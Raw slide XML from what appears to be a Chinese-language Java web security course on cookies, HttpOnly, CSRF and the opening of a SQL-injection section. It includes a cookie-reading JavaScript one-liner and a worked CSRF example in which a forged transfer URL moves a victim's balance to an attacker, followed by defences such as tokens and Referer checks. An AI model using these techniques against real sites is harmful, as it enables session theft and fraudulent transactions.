              <a:t>if(!"".equals(name)){</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>            Cookie cookies = new Cookie("name",name);//把用户名放到cookie</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>            cookies.setMaxAge(60*60*60*12*30) ;//设置cookie的有效期</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>     //     c1.setDomain(".ahack.net");//设置有效的域     </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>       response.addCookie(cookies);//把Cookie保存到客户端</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>            out.println("当前登录:"+name);</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>}else {</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>            out.println("用户名不能为空!");     </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>}     </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1257300"/>
            <a:ext cx="6495415" cy="3237865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1204595"/>
            <a:ext cx="7009765" cy="3561715"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JavaEE 基础</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Web请求与相应简要的流程：</a:t>
            </a:r>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r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果请求的是JSP，tomcat会把我们的JSP编译成Servlet也就是一个普通的Java类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="673735" y="1082040"/>
            <a:ext cx="4237990" cy="2295525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>javascript:document.write(document.cookie)     </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1586230"/>
            <a:ext cx="5933440" cy="2580640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>用FireFox创建cookie：</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>TamperData修改Cookie：     </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1464310"/>
            <a:ext cx="6514465" cy="1581150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5770880" y="902970"/>
            <a:ext cx="3037840" cy="3552190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000"/>
              <a:t>之前我们用</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>javascript:document.write(document.cookie)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>通过document对象能够拿到存储于客户端的cookie信息。</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>HttpOnly设置后再使用document.cookie去取cookie值就不行了。</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>普通的cookie设置：</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H;</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>加上HttpOnly后的Cookie：</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Cookie: jsessionid=AS348AF929FK219CKA9FK3B79870H; </a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>HttpOnly;</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>CSRF (跨站域请求伪造)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>CSRF（Cross Site Request Forgery, 跨站域请求伪造）用户请求</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>伪造，以受害人的身份构造恶意请求。(经典解析参考：</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>http://www.ibm.com/developerworks/cn/web/1102_niugang</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>_csrf/ )</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>CSRF (跨站域请求伪造)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>CSRF 攻击的对象</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>CSRF 攻击是黑客借助受害者的 cookie 骗取服务器的信任，但是</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>黑客并不能拿到 cookie，也看不到 cookie 的内容。</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>我们要保护的对象是那些可以直接产生数据改变的服务，而对于读</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>取数据的服务，则不需要进行 CSRF 的保护。</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>CSRF (跨站域请求伪造)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>Csrf攻击方式</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>对象：A：普通用户，B：攻击者</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、假设A已经登录过xxx.com并且取得了合法的session，假设用户中心地址为：http://xxx.com/ucenter/index.do</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、B想把A余额转到自己的账户上，但是B不知道A的密码，通过分析转账功能发现xxx.com网站存在CSRF攻击漏洞和XSS漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3、B通过构建转账链接的URL如：http://xxx.com/ucenter/index.do?action=transfer&amp;money=100000 &amp;toUser=(B的帐号)，因为A已经登录了所以后端在验证身份信息的时候肯定能取得A的信息。B可以通过xss或在其他站点构建这样一个URL诱惑A去点击或触发Xss。一旦A用自己的合法身份去发送一个GET请求后A的100000元人民币就转到B账户去了。当然了在转账支付等操作时这种低级的安全问题一般都很少出现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr sz="2000"/>
              <a:t>CSRF (跨站域请求伪造)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防御CSRF：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>验证 HTTP Referer 字段</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在请求地址中添加 token 并验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在 HTTP 头中自定义属性并验证</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>加验证码(copy防御CSRF毫无意义，参考上面给的IBM专题的URL)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常见的做法是加token,Java里面典型的做法是用filter：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://code.google.com/p/csrf-filter/(链接由plt提供，源码上面的在：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://ahack.iteye.com/blog/1900708)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CSRF的介绍drops已有文章，可以参考：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://drops.wooyun.org/papers/155</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JDBC和ORM</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JDBC（Java Data Base Connectivity,java数据库连接）是一种用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>于执行SQL语句的Java API，可以为多种关系数据库提供统一访问。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JPA:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JPA全称Java Persistence API.JPA通过JDK 5.0注解或XML描述对</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>象－关系表的映射关系，并将运行期的实体对象持久化到数据库中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一个ORM规范。Hibernate是JPA的具体实现。但是Hibernate</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>出现的时间早于JPA（因为Hibernate作者很狂，sun看不惯就叫他</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>去制定JPA标准去了哈哈）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRP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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
